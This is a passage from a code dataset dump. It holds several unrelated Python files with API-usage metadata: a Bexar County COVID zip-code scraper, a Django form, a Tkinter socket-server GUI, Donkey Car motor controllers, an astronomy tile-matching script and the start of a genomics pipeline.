"call"}, {"api_name": "pytest.mark.skipIf", "line_number": 430, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 430, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 431, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 431, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 449, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 449, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 450, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 450, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 451, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 451, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 452, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 452, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 453, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 453, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 454, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 454, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 455, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 455, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 456, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 456, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 457, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 457, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 458, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 458, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 459, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 459, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 460, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 460, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 461, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 461, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 462, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 462, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 464, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 472, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 476, "usage_type": "call"}, {"api_name": "pytz.utc", "line_number": 476, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 477, "usage_type": "call"}, {"api_name": "pytz.utc", "line_number": 477, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 479, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 480, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 482, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 483, "usage_type": "call"}, {"api_name": "pytest.mark.skipIf", "line_number": 445, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 445, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 446, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 446, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 504, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 504, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 505, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 505, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 506, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 506, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 507, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 507, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 509, "usage_type": "call"}, {"api_name": "warnings.catch_warnings", "line_number": 518, "usage_type": "call"}, {"api_name": "pytest.mark.skipIf", "line_number": 500, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 500, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 501, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 501, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 536, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 537, "usage_type": "call"}, {"api_name": "pytest.mark.skipIf", "line_number": 533, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 533, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 544, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 546, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 546, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 546, "usage_type": "name"}, {"api_name": "pytest.mark.skipIf", "line_number": 541, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 541, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 542, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 542, "usage_type": "attribute"}]} +{"seq_id": "202133286", "text": "import requests\nimport os, sys, time\nimport parse_data_utils\nfrom datetime import datetime\n\n# ===========================================\n# Grab update time information\n# ===========================================\n\n# Page only tells \"Updated daily at 7 PM [CDT]\"\n# as of 4/19/2020. Thus, just take current date.\n# Make sure to run this between 5 and 11:59 PM\n# for Pacific time!\n\n# Need date in format MM/DD/YYYY\ndate_parts = str(datetime.date(datetime.now())).split('-')\ndate = date_parts[1] + '/' + date_parts[2] + '/' + date_parts[0]\n\n# ===========================================\n# Grab current zip code-case counts data\n# ===========================================\n\nsan_antonio_url = \"https://services.arcgis.com/g1fRTDLeMgspWrYp/arcgis/rest/services/vBexarCountyZipCodes_EnrichClip/FeatureServer/0/query?f=json&where=1%3D1&returnGeometry=false&outFields=*&orderByFields=ZIP_CODE%20asc\"\nsan_antonio_case_field = u'CasesP100000'\n\nresponse = requests.get(san_antonio_url) # REST API query\n\ntry:\n\tall_zip_json = response.json()[u'features']\nexcept:\n\tsys.exit(\"ERROR: JSON response does not have 'features' field. URL may be incorrect or field names may have changed.\")\n\n# Loading population data to estimate case counts\nsan_antonio_pop_data_path = os.path.abspath(\"./san_antonio_pop_by_zip.csv\")\nsan_antonio_pop_data_file = open(san_antonio_pop_data_path, 'r')\nsan_antonio_pop_data_file.readline() # Get rid of header\n\nzip_code_pop_dict = {}\nfor line in san_antonio_pop_data_file:\n\tvalues = line.strip().split(',')\n\tzip_code, pop = values[1], values[7]\n\tzip_code_pop_dict[zip_code] = int(pop)\n\nsan_antonio_pop_data_file.close()\n\nzip_codes = [] # List of zip codes\ncase_counts = [] # List of case counts\n\nfor zip_json in all_zip_json:\n\tcases_per_100k = zip_json[u'attributes'][san_antonio_case_field]\n\tzip_code = zip_json[u'attributes'][u'ZIP_CODE']\t\n\tif zip_code in zip_code_pop_dict:\n\t\tcase_count = int(round(cases_per_100k*zip_code_pop_dict[zip_code]/100000))\n\t\tcase_counts.append(case_count)\n\t\tzip_codes.append(zip_code)\n\n# ===========================================\n# Store previous data in dictionary\n# ===========================================\n\nus_cases_rel_scripts_path = os.path.abspath(\"../processed_data/cases/US\") # Path to data relative to scripts\nprev_data_fpath = \"%s/bexar-county_cases.csv\" % us_cases_rel_scripts_path\nprev_data_file = open(prev_data_fpath, 'r')\nheader = prev_data_file.readline().strip().split(',')\n\n# IMPORTANT: Only append new data if date isn't already there\nquoted_date = parse_data_utils.date_string_to_quoted(date)\n\nif quoted_date in header:\n\tprev_data_file.close()\n\tsys.exit(\"This date has already been updated. May need to check if multiple updates were made in the same day.\")\n\ndata = {} # Keys are zip codes, values are lists of case counts\n\nfor row in prev_data_file:\n\tvalues = row.strip().split(',')\n\tzip_code = values[0]\n\tcase_counts_prev = values[1:]\n\tdata[zip_code] = case_counts_prev\n\nprev_data_file.close()\n\n# ===========================================\n# Add today's data and overwrite .csv\n# ===========================================\n\nnum_dates = len(header) - 1 # Excludes today\n\nfor zip_code, case_count in zip(zip_codes, case_counts):\n\tquoted_zip_code = '\"%s\"' % zip_code\n\tif quoted_zip_code in data:\n\t\tdata[quoted_zip_code].append(str(case_count))\n\telse: # New zip code\n\t\tdata[quoted_zip_code] = ['NA'] * (num_dates)\n\t\tdata[quoted_zip_code].append(str(case_count))\n\n# Missing zip codes\nfor zip_code in data:\n\tif len(data[zip_code]) < (num_dates + 1):\n\t\tdata[zip_code].append(\"NA\")\n\n# Make sure everything has the same length\n# (There might be duplicates!)\nfor zip_code in data:\n\tif len(data[zip_code]) != (num_dates + 1):\n\t\tsys.exit(\"ERROR: Inconsistency in number of data points for zip code %s\" % zip_code)\n\n# Overwrite csv\ndata_file = open(prev_data_fpath, 'w')\n\nheader.append(quoted_date)\ndata_file.write(','.join(header) + \"\\n\")\nsorted_zip_codes = sorted(data.keys())\n\nfor zip_code in sorted_zip_codes:\n\tdata_file.write('%s,' % zip_code)\n\tdata_file.write(','.join(data[zip_code]) + \"\\n\")\n\ndata_file.close()\n", "sub_path": "scripts/bexar-county_scrape.py", "file_name": "bexar-county_scrape.py", "file_ext": "py", "file_size_in_byte": 4077, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime.date", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "parse_data_utils.date_string_to_quoted", "line_number": 67, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "288396794", "text": "# coding=utf-8\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit\nfrom django import forms\n\nfrom solotodo.models import Product\n\n\nclass BudgetCreationForm(forms.Form):\n name = forms.CharField(max_length=255, label='Nombre')\n initial_product = forms.ModelChoiceField(\n queryset=Product.objects.all(), required=False,\n widget=forms.HiddenInput)\n next_url = forms.CharField(required=False, widget=forms.HiddenInput)\n\n def __init__(self, *args, **kwargs):\n super(BudgetCreationForm, self).__init__(*args, **kwargs)\n\n helper = FormHelper()\n helper.form_class = 'form-horizontal ' \\\n 'form_without_actions_decoration ' \\\n 'with_margin_top'\n helper.form_method = 'post'\n helper.form_action = '.'\n helper.add_input(Submit('submit', u'Crear cotización'))\n\n self.helper = helper\n", "sub_path": "hardware/forms/budget_creation_form.py", "file_name": "budget_creation_form.py", "file_ext": "py", "file_size_in_byte": 930, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.forms.Form", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 10, "usage_type": "name"}, {"api_name": "django.forms.ModelChoiceField", "line_number": 11, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 11, "usage_type": "name"}, {"api_name": "solotodo.models.Product.objects.all", "line_number": 12, "usage_type": "call"}, {"api_name": "solotodo.models.Product.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "solotodo.models.Product", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.HiddenInput", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 13, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.HiddenInput", "line_number": 14, "usage_type": "attribute"}, {"api_name": "crispy_forms.helper.FormHelper", "line_number": 19, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Submit", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "567406537", "text": "# https://pythonprogramming.net/python-3-tkinter-basics-tutorial/\nimport logging\nimport socket\nfrom queue import Queue\nfrom threading import Thread\nfrom tkinter import *\n\nfrom labo05.demo_networking.clientserver8.server.server import SommenServer\n\n\nclass ServerWindow(Frame):\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.master = master\n self.init_window()\n self.server = None\n self.thread_listener_queue=None\n self.init_messages_queue()\n\n\n\n # Creation of init_window\n def init_window(self):\n # changing the title of our master widget\n self.master.title(\"Server\")\n\n # allowing the widget to take the full space of the root window\n self.pack(fill=BOTH, expand=1)\n\n Label(self, text=\"Log-berichten server:\").grid(row=0)\n self.scrollbar = Scrollbar(self, orient=VERTICAL)\n self.lstnumbers = Listbox(self, yscrollcommand=self.scrollbar.set)\n self.scrollbar.config(command=self.lstnumbers.yview)\n\n self.lstnumbers.grid(row=1, column=0, sticky=N + S + E + W)\n self.scrollbar.grid(row=1, column=1, sticky=N + S)\n\n self.btn_text = StringVar()\n self.btn_text.set(\"Start server\")\n self.buttonServer = Button(self, textvariable=self.btn_text, command=self.start_stop_server)\n self.buttonServer.grid(row=3, column=0, columnspan=2, pady=(5, 5), padx=(5, 5), sticky=N + S + E + W)\n\n Grid.rowconfigure(self, 1, weight=1)\n Grid.columnconfigure(self, 0, weight=1)\n\n\n def start_stop_server(self):\n if self.server is not None:\n self.__stop_server()\n else:\n self.__start_server()\n\n def __stop_server(self):\n self.server.stop_server()\n self.server = None\n logging.info(\"Server stopped\")\n self.btn_text.set(\"Start server\")\n\n def __start_server(self):\n self.server = SommenServer(socket.gethostname(), 9999, self.messages_queue)\n self.server.init_server()\n self.server.start() # in thread plaatsen!\n logging.info(\"Server started\")\n self.btn_text.set(\"Stop server\")\n\n def init_messages_queue(self):\n self.messages_queue = Queue()\n self.thread_listener_queue = Thread(target=self.print_messsages_from_queue, name=\"Queue_listener_thread\", daemon=True)\n self.thread_listener_queue.start()\n\n def print_messsages_from_queue(self):\n message = self.messages_queue.get()\n while message != \"CLOSE_SERVER\":\n self.lstnumbers.insert(END, message)\n self.messages_queue.task_done()\n message = self.messages_queue.get()", "sub_path": "server(demo)/gui_server.py", "file_name": "gui_server.py", "file_ext": "py", "file_size_in_byte": 2651, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.info", "line_number": 56, "usage_type": "call"}, {"api_name": "labo05.demo_networking.clientserver8.server.server.SommenServer", "line_number": 60, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 63, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 67, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "574236940", "text": "import numpy as np\nimport shapely.geometry as geometry\nimport easyaccess as ea\n\ncon=ea.connect()\n\nq2='SELECT f.RA_CENT,f.DEC_CENT,f.RAC1,f.RAC2,f.RAC3,f.RAC4,f.DECC1,f.DECC2,f.DECC3,f.DECC4,f.ID,d.TILENAME FROM RUMBAUGH.Y3A1_TILENAMES_LIST d,DES_ADMIN.Y3A1_COADDTILE_GEOM f WHERE d.tilename=f.tilename'\n\nTDF=con.query_to_pandas(q2)\n\nboxes={TDF['TILENAME'][i]: geometry.MultiPoint(list(np.array([[TDF['RAC1'][i],TDF['DECC1'][i]],[TDF['RAC2'][i],TDF['DECC2'][i]],[TDF['RAC3'][i],TDF['DECC3'][i]],[TDF['RAC4'][i],TDF['DECC4'][i]]]))).convex_hull for i in np.arange(0,np.shape(TDF)[0])}\n\nTDFtilenames,TDFrac,TDFdecc=np.array(TDF['TILENAME']),np.array(TDF['RA_CENT']),np.array(TDF['DEC_CENT'])\n\nqm='SELECT * from RUMBAUGH.SDSSPOSS_HPIX'\nMDF=con.query_to_pandas(qm)\n\noutcr=np.zeros((np.shape(MDF)[0],np.shape(MDF)[1]),dtype='|S20')\noutcr[:,0],outcr[:,1],outcr[:,2]=np.array(MDF['SP_ROWNUM']),np.array(MDF['RA']),np.array(MDF['DEC'])\n\nfor i in range(0,np.shape(MDF)[0]):\n curmra,curmdec=MDF['RA'][i],MDF['DEC'][i]\n gclose=np.where(np.sqrt((TDFrac-curmra)**2+(TDFdecc-curmdec)**2)<1.5)[0]\n gs=np.argsort(np.sqrt((TDFrac[gclose]-curmra)**2+(TDFdecc[gclose]-curmdec)**2))\n foundbox,cnt=False,-1\n while ((not(foundbox))&(cnt 0:\n pulse = map_range(throttle,\n 0, self.MAX_THROTTLE, \n self.zero_pulse, self.max_pulse)\n else:\n pulse = map_range(throttle,\n self.MIN_THROTTLE, 0, \n self.min_pulse, self.zero_pulse)\n\n sys.stdout.flush()\n self.controller.set_pulse(pulse)\n return '123'\n\n\nclass SerialInterface:\n ''' \n We need one instance of this class per device to control connection\n '''\n\n ser = None\n logfile = None\n\n def log_serial(self):\n '''\n We must read messages from serial device else we may get blocked io\n '''\n interrupted = False\n while not interrupted:\n try:\n if self.ser is None or self.ser.in_waiting <= 0:\n time.sleep(0.01)\n else:\n line=self.ser.readline()\n if len(line):\n if self.log:\n self.logfile.write(line)\n else:\n print(line)\n\n except (serial.SerialException, serial.serialutil.SerialException,\n serial.SerialTimeoutException):\n time.sleep(0.01)\n pass #Try again\n\n except KeyboardInterrupt:\n interrupted = True\n cleanup()\n raise\n\n\n #def __init__(self, device='/dev/ttyACM0', rate=115200, log=False):\n def __init__(self, device='/dev/serial0', rate=115200, log=False):\n import tempfile\n from threading import Thread\n\n self.log = log\n #Create a logfile\n if log and self.logfile is None:\n self.logfile = tempfile.NamedTemporaryFile(prefix='ser_', dir='.', delete=False)\n\n # Initialise the serial connection from RPi to its controller\n if self.ser is None:\n #Don't open the port yet\n self.ser = serial.Serial()\n self.ser.port = device\n self.ser.baudrate = rate\n self.ser.timeout = 0\n self.inWrite = False\n self.firstTime = True\n print(\"Serial device to open\", device)\n self.openDevice()\n\n else:\n print(\"Serial is already open\")\n\n atexit.register(self.cleanup)\n\n\n def openDevice(self):\n #devices = [self.ser.port, '/dev/ttyACM0', '/dev/ttyACM1']\n #for device in devices:\n try:\n #self.ser.port = device\n self.ser.open()\n #Wait for arduino to reset\n time.sleep(2)\n if not self.ser.is_open:\n self.ser.close()\n else:\n #Read everything already in pipe and ignore\n self.ser.flushInput()\n #self.ser.reset_input_buffer()\n return\n\n except serial.SerialException:\n print('Failed to open ' + device)\n\n # If we reached here, none of the ports was opened\n raise serial.SerialException\n\n def send_msg(self, msg):\n # Do this for only one channel\n if self.ser is None:\n print(\"Serial device doesn't exist\")\n return\n\n #if not self.ser.is_open:\n # print(\"Serial device is not open\")\n # self.openDevice()\n\n if not self.ser.is_open:\n print(\"Serial device could not be opened\")\n return\n\n while self.inWrite:\n time.sleep(0.001)\n self.inWrite = True\n try:\n if self.firstTime:\n # We no longer have to do this\n # Ask serial to send debug messages\n #self.ser.write('d\\n'.encode())\n #self.ser.flush()\n #self.ser.write('m=2\\n'.encode())\n #self.ser.flush()\n #self.ser.write('n\\n'.encode())\n #self.ser.flush()\n self.firstTime = False\n self.ser.write(msg.encode())\n self.ser.flush()\n\n except serial.SerialException:\n print(\"Failed to write to Serial device\")\n\n self.inWrite = False\n\n\n def cleanup(self):\n if self.logfile is not None:\n self.logfile.close()\n self.ser.close()\n\n\nclass Differential_PassThrough_Controller:\n ''' \n Generic Differential Pass Through Motor Controller \n For differential drive cars you need one controller for each side.\n PassThrough means the RPi will pass it to its controller via serial interface\n '''\n\n #This is shared between instances\n serialInterf = None\n\n #def __init__(self, motor_num, device='/dev/ttyACM0', rate=115200):\n def __init__(self, motor_num, device='/dev/serial0', rate=115200):\n # Initialise the serial connection from RPi to its controller\n if Differential_PassThrough_Controller.serialInterf is None:\n Differential_PassThrough_Controller.serialInterf = SerialInterface(device, rate)\n\n #Motor_num 0 for left, 1 for right\n if motor_num == 0 or motor_num == 1:\n self.motor_num = motor_num\n else:\n raise Exception(\"invalid motor number\")\n\n self.throttle = 0\n atexit.register(self.set_pulse, pulse=0)\n \n\n def set_pulse(self, pulse):\n '''\n Required for caliberation\n '''\n self.turn(pulse)\n \n\n def turn(self, throttle):\n '''\n Update the speed of the motor\n '''\n \n # Direction can be inferred by + or - so use 8bit range\n #throttle = int(map_range(abs(speed), -1, 1, -127, 127))\n if throttle == self.throttle:\n return\n\n self.throttle = throttle\n if self.motor_num == 0:\n msg = \"L=\"\n else:\n msg = \"R=\"\n msg += str(self.throttle) + '\\n'\n #print('\\n' + msg)\n Differential_PassThrough_Controller.serialInterf.send_msg(msg)\n\n \n def test(self, seconds=.5):\n speeds = [-.5, -1, -.5, 0, .5, 1, 0]\n for s in speeds:\n self.turn(s)\n time.sleep(seconds)\n print('speed: %s, throttle=self.throttle' % (s, self.throttle))\n print('motor #%s test complete'% self.motor_num)\n \n\nclass PassThrough_Controller:\n ''' \n Pass control over to motor controller over serial connection. \n '''\n\n serialInterf = None\n\n #def __init__(self, channel, device='/dev/ttyACM0', rate=115200):\n def __init__(self, channel, device='/dev/serial0', rate=115200):\n # Initialise the serial connection from RPi to its controller\n if PassThrough_Controller.serialInterf is None:\n PassThrough_Controller.serialInterf = SerialInterface(device, rate)\n\n if channel == 0 or channel == 1:\n self.channel = channel\n else:\n raise Exception(\"invalid channel\")\n\n self.lastVal = 0\n\n #channel 0 for throttle and 1 for steering\n atexit.register(self.set_pulse, pulse=0)\n \n\n def set_pulse(self, pulse):\n #if pulse == self.lastVal:\n # return\n if self.channel == 0:\n msg = \"T=\"\n else:\n msg = \"S=\"\n msg += str(pulse) + '\\n'\n #print('\\n' + msg)\n PassThrough_Controller.serialInterf.send_msg(msg)\n\n\nclass Adafruit_Motor_Hat_Controller:\n ''' \n Adafruit DC Motor Controller \n For differential drive cars you need one controller for each motor.\n '''\n def __init__(self, motor_num):\n from Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor\n import atexit\n \n self.FORWARD = Adafruit_MotorHAT.FORWARD\n self.BACKWARD = Adafruit_MotorHAT.BACKWARD\n self.mh = Adafruit_MotorHAT(addr=0x60) \n \n self.motor = self.mh.getMotor(motor_num)\n self.motor_num = motor_num\n \n atexit.register(self.turn_off_motors)\n self.speed = 0\n self.throttle = 0\n \n\n def turn_off_motors(self):\n self.mh.getMotor(self.motor_num).run(Adafruit_MotorHAT.RELEASE)\n\n\n def turn(self, speed):\n '''\n Update the speed of the motor where 1 is full forward and\n -1 is full backwards.\n '''\n if speed > 1 or speed < -1:\n raise ValueError( \"Speed must be between 1(forward) and -1(reverse)\")\n \n self.speed = speed\n self.throttle = int(map_range(abs(speed), -1, 1, -255, 255))\n \n if speed > 0: \n self.motor.run(self.FORWARD)\n else:\n self.motor.run(self.BACKWARD)\n \n self.motor.setSpeed(self.throttle)\n \n \n def test(self, seconds=.5):\n speeds = [-.5, -1, -.5, 0, .5, 1, 0]\n for s in speeds:\n self.turn(s)\n time.sleep(seconds)\n print('speed: %s throttle: %s' % (self.speed, self.throttle))\n print('motor #%s test complete'% self.motor_num)\n \n\n", "sub_path": "donkey/actuators.py", "file_name": "actuators.py", "file_ext": "py", "file_size_in_byte": 11388, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "Adafruit_PCA9685.PCA9685", "line_number": 50, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 106, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 119, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 119, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 140, "usage_type": "call"}, {"api_name": "serial.SerialException", "line_number": 149, "usage_type": "attribute"}, {"api_name": "serial.serialutil", "line_number": 149, "usage_type": "attribute"}, {"api_name": "serial.SerialTimeoutException", "line_number": 150, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 151, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 168, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 173, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 185, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 195, "usage_type": "call"}, {"api_name": "serial.SerialException", "line_number": 204, "usage_type": "attribute"}, {"api_name": "serial.SerialException", "line_number": 208, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 225, "usage_type": "call"}, {"api_name": "serial.SerialException", "line_number": 241, "usage_type": "attribute"}, {"api_name": "{'tempfile': 'tempfile', 'Thread': 'threading.Thread'}", "line_number": 267, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 276, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 310, "usage_type": "call"}, {"api_name": "{'tempfile': 'tempfile', 'Thread': 'threading.Thread'}", "line_number": 326, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 336, "usage_type": "call"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT.FORWARD", "line_number": 360, "usage_type": "attribute"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT", "line_number": 360, "usage_type": "name"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT.BACKWARD", "line_number": 361, "usage_type": "attribute"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT", "line_number": 361, "usage_type": "name"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT", "line_number": 362, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 367, "usage_type": "call"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT.RELEASE", "line_number": 373, "usage_type": "attribute"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT", "line_number": 373, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 399, "usage_type": "call"}]} +{"seq_id": "216451011", "text": "#! /usr/bin/python3\nimport os\nimport sys\nimport glob\nimport time\nimport shutil\nimport logging\nimport argparse\nimport subprocess\nimport pandas as pd\nfrom pathlib import Path\nfrom itertools import repeat\nfrom multiprocessing import Pool\nfrom pyamd.bbduk import QualCheck\nfrom pyamd.alignment import Bwa\nfrom pyamd.alignment import Bowtie\nfrom pyamd.alignment import BBMap\nfrom pyamd.alignment import Snap\nfrom pyamd.samtools import Samtools\nfrom pyamd.gatk import GenAnTK\nfrom pyamd.gatk import Picard\nfrom pyamd.kestrel import KestrelVar\n#from pyamd.annotater import Annotate\nfrom pyamd.kestrel import kes_runner\nfrom pyamd.summarize import Summary\nfrom pyamd.prepinputs import Prepper\nfrom pyamd.parsers.vcf import Vcf\n\ndef main(arguments):\n bbduk_path = arguments[0]\n alinger_path = arguments[1]\n smt_path = arguments[2]\n bft_path = arguments[3]\n gatk_path = arguments[4]\n rone_path = arguments[5]\n rtwo_path = arguments[6]\n ref_path = arguments[7]\n adp_path = arguments[8]\n bed_path = arguments[9]\n out_dir = arguments[10]\n aligner = arguments[11]\n pic_path = arguments[12]\n sam_name = arguments[13]\n voi_path = arguments[14]\n java_path = arguments[15]\n #Setup logging\n #Get logger for main method\n main_logger = logging.getLogger('Kookaburra.{0}'.format(sam_name))\n #Check if files are present\n #sam_name = config[samples].sample\n #rone_path = config[samples].files[0]\n #rtwo_path = config[samples].files[1]\n out_path = '{0}/{1}'.format(os.path.abspath(out_dir), sam_name)\n if not os.path.exists(out_path):\n os.mkdir(out_path)\n #main_logger.info('Analyzing sample : {0}'.format(sam_name))\n\n\n if not os.path.exists(rone_path):\n raise FileNotFoundException('Forward read not found; Exiting MARs')\n sys.exit()\n\n if not os.path.exists(rtwo_path):\n raise FileNotFoundException('Reverse read not found; Exiting MARs')\n sys.exit()\n\n if not os.path.exists(ref_path):\n raise FileNotFoundException('Reference fasta file not found; Exiting MARs')\n sys.exit()\n\n if not os.path.exists(adp_path):\n raise FileNotFoundException('Adpater sequence not found; Exiting MARs')\n sys.exit()\n\n if not os.path.exists(out_path):\n os.mkdir(out_path)\n\n #Create completion folder\n completion_path = '{0}/completion'.format(out_path)\n if not os.path.exists(completion_path):\n os.mkdir(completion_path)\n\n #Call Bbduk\n main_logger.debug('Running BBDuk')\n if os.path.exists('{0}/bbduk.rt'.format(completion_path)):\n brone = os.path.splitext(os.path.basename(rone_path))[0]\n brtwo = os.path.splitext(os.path.basename(rtwo_path))[0]\n rone_path = '{0}/{1}/{2}_cleaned.fq'.format(out_path, 'CleanedFastq', brone)\n rtwo_path = '{0}/{1}/{2}_cleaned.fq'.format(out_path, 'CleanedFastq', brtwo)\n main_logger.debug('Skipping BBDuk')\n bret = 0\n else:\n bbduk = QualCheck(bbduk_path, adp_path, out_path, java_path)\n rone_path, rtwo_path, bret = bbduk.bbduk(rone_path, rtwo_path)\n if bret == 0:\n Path('{0}/bbduk.rt'.format(completion_path)).touch()\n if bret != 0:\n raise RuntimeError('BBDuk failed to complete; Exiting MARs')\n else:\n 